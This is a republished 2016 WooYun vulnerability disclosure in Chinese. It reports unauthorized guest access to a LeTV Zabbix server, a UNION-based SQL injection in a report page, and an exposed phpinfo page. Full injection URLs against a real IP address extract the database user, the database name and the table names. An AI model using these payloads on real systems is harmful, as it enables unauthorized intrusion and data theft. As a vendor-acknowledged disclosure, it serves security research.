乐视某处一处SQL注入+未授权访问

admin 2017年5月3日13:04:59评论525 views字数 203阅读0分40秒阅读模式
摘要

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2016-206153

漏洞标题: 乐视某处一处SQL注入+未授权访问

相关厂商: 乐视网

漏洞作者: DloveJ

提交时间: 2016-05-08 09:59

公开时间: 2016-06-22 10:50

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 配置错误

1人收藏


漏洞详情

披露状态:

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

简要描述:

乐视某处一处注入+未授权访问

详细说明:

#1

http://115.182.92.226/zabbix/

允许访客访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

乐视某处一处SQL注入+未授权访问

#2 注入

乐视某处一处SQL注入+未授权访问

尝试注入

code 区域
http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=not+selected&module=all&local=all&groups=ALLHOSTS&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2

参数groups business local

code 区域
http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,user(),database()%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2

乐视某处一处SQL注入+未授权访问

code 区域
view-source:http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=%27zabbix%27%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2

乐视某处一处SQL注入+未授权访问

#3 phpinfo

code 区域
http://115.182.92.226/phpinfo.php

乐视某处一处SQL注入+未授权访问

漏洞证明:

code 区域
user:
db:zabbix

修复方案:

限制guest

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-05-08 10:43

厂商回复:

感谢对乐视安全的关注,内部扫描器已经发现了该漏洞。请给我们一点时间来推进开发修复,甲方的童鞋应该都明白推进漏洞修复的难度……

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-06-22 11:54 | 小涛 ( 路人 | Rank:17 漏洞数:8 | 小老弟,你跟谁俩呢)

    0

    6666

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin